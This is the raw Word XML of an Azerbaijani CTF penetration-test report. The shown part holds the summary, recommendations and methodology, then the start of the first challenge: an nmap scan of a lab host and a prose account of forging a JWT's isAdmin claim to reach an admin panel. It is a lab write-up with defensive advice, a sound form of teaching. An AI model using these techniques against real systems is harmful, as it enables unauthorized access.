        <w:t>• Hər challenge üçün ekran görüntüləri, əmrlər və nəticələr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• İmtiyaz yüksəltmə və əldə olunan bayraqların sübutu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Yüksək səviyyəli xülasə</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yoxlanılmış üç CTF mühiti fərqli zəiflik siniflərini nümayiş etdirdi: JWT etibarının pozulması və SQL injection, açıq komanda icrası verən web shell, həmçinin GitLab, Serv-U və LXD kimi məhsullardakı yanlış konfiqurasiya və məlum zəifliklər.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tövsiyələr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İmza açarlarının təhlükəsiz idarəsi, giriş nəzarətinin sərtləşdirilməsi, zəif endpoint-lərin bağlanması, gizli məlumatların tətbiq konfiqurasiyalarında saxlanmaması, həmçinin SUID və sudo icazələrinin dövri auditi əsas müdafiə tədbirləri kimi tövsiyə olunur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Metodologiya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İş prosesi klassik red team/pentest axını üzrə qurulmuşdur: informasiya toplama, xidmət enumerasiyası, ilkin giriş, shell sabitləşdirilməsi, daxili enumerasiya, privilege escalation və sonda sübutların toplanması.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İnformasiya toplama</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bu mərhələdə canlı hostların aşkarlanması, açıq portların və xidmət banner-lərinin toplanması, eləcə də web tətbiqlərinin səthinin xəritələnməsi həyata keçirilmişdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Xidmət enumerasiyası</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap, Gobuster, Burp Suite, ffuf və tətbiqdaxili analiz vasitələri ilə giriş nöqtələri, endpoint-lər, istifadəçi adları, versiya məlumatları və potensial zəifliklər müəyyən edilmişdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İstismar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tapılmış zəifliklərdən istifadə etməklə admin panelinə keçid, SQL injection, web shell üzərindən komanda icrası, Jenkins Script Console və GitLab fayl oxuma zəifliyi vasitəsilə ilkin giriş və ya lateral hərəkət əldə olunmuşdur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mövqenin saxlanması</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lazım olan hallarda reverse shell qurulmuş, interaktiv shell sabitləşdirilmiş və daha yüksək imtiyazlı istifadəçi hesablarına keçmək üçün sistem daxilindən əlavə məlumat toplanmışdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Təmizləmə</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bu hesabatın məqsədi zəiflik zəncirini və sübutları sənədləşdirməkdir; davamlı implant və ya daimi dəyişiklik yaradılmamışdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Independent Challenges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CTF 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hədəf tipi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Node.js tətbiqi + Jenkins + Linux host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Aşkarlanan portlar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>22/ssh, 8000/http, 8080/jenkins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İlkin giriş</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>JWT privilege bypass və admin endpoint üzərində SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İstifadəçi bayraqları</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>user1, user2, user3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Yekun imtiyaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1 İnformasiya toplama və ilkin analiz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap ilə port və servis enumerasiyası aparıldı. Nəticədə 22/tcp üzərində SSH, 8000/tcp üzərində custom web tətbiqi və 8080/tcp üzərində Jenkins xidməti aşkar edildi. Bu, challenge daxilində həm tətbiq səviyyəsində, həm də idarəetmə paneli səviyyəsində ayrıca hücum səthinin olduğunu göstərdi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Bu addımın məqsədi sistemin hücum səthini xəritələmək, açıq portları və orada çalışan servis-ləri müəyyən etmək idi. Bu məlumat olmadan növbəti mərhələdə hansı texnologiyaya və hansı zəifliyə fokuslanacağımız aydın olmur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -vv -sVC 192.168.100.129 -T5 -oN ./nmap/ctf.nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3849983"/>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94960" cy="3849983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tətbiqin ilkin login səhifəsi. Bu ekran hücumun web tətbiqindən başlayacağını və qeydiyyat/giriş mexanizminin test edilməli olduğunu göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2105043"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2105043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp Suite-in açılması. Burp vasitəsilə qeydiyyat və giriş sorğularını tutmaq, JWT tokenin necə verildiyini görmək və sonradan sorğuları manipulyasiya etmək mümkün olur.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.2 JWT manipulyasiyası ilə admin panelinə keçid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp Suite üzərindən giriş sorğusu analiz edildi və cavabda JWT token qaytarıldığı görüldü. Token decode edildikdə isAdmin dəyərinin false olduğu müşahidə edildi. Token yenidən qurulub isAdmin true edildikdən sonra cookie-də istifadə olundu və admin panelinə giriş alındı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Buradakı məqsəd tətbiqin autentifikasiya məntiqinin server tərəfdə düzgün yoxlanılıb-yoxlanılmadığını anlamaq idi. Əgər server JWT daxilindəki dəyərlərə həddən artıq etibar edirsə, istifadəçi hüquqları yalnız token redaktəsi ilə yüksələ bilər.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JWT cavabı browser cookie-sində saxlanıldı və dəyişdirilmiş token yenidən tətbiqə göndərildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2000428"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (2).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2000428"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Giriş sorğusundan sonra serverin success cavabı ilə birlikdə JWT qaytardığını göstərən ekran. Hücum zəncirinin başlanğıc nöqtəsi məhz bu token-dir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2010199"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (3).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2010199"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JWT məzmununun analiz edilməsi. Burada isAdmin sahəsinin false olduğu görünür və bu dəyərin dəyişdirilməsi ideyası formalaşır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1708733"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (4).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1708733"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JWT içində hüquq səviyyəsinin dəyişdirilməsi. Buradakı məqsəd tətbiqin yalnız token payload-a etibar edib-etmədiyini yoxlamaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3015294"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (5).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3015294"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yenidən kodlanmış və admin səlahiyyəti daşıyan token. Bu mərhələ uğurlu olarsa, tətbiq server tərəfdə rol yoxlamasını düzgün etmir deməkdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2153333"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (6).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2153333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dəyişdirilmiş tokenin cookie daxilində istifadə olunması. Beləliklə brauzer yeni səlahiyyətlə admin endpoint-ə müraciət edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1036862"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (8).png"/>
                    <pic:cNvPicPr/>
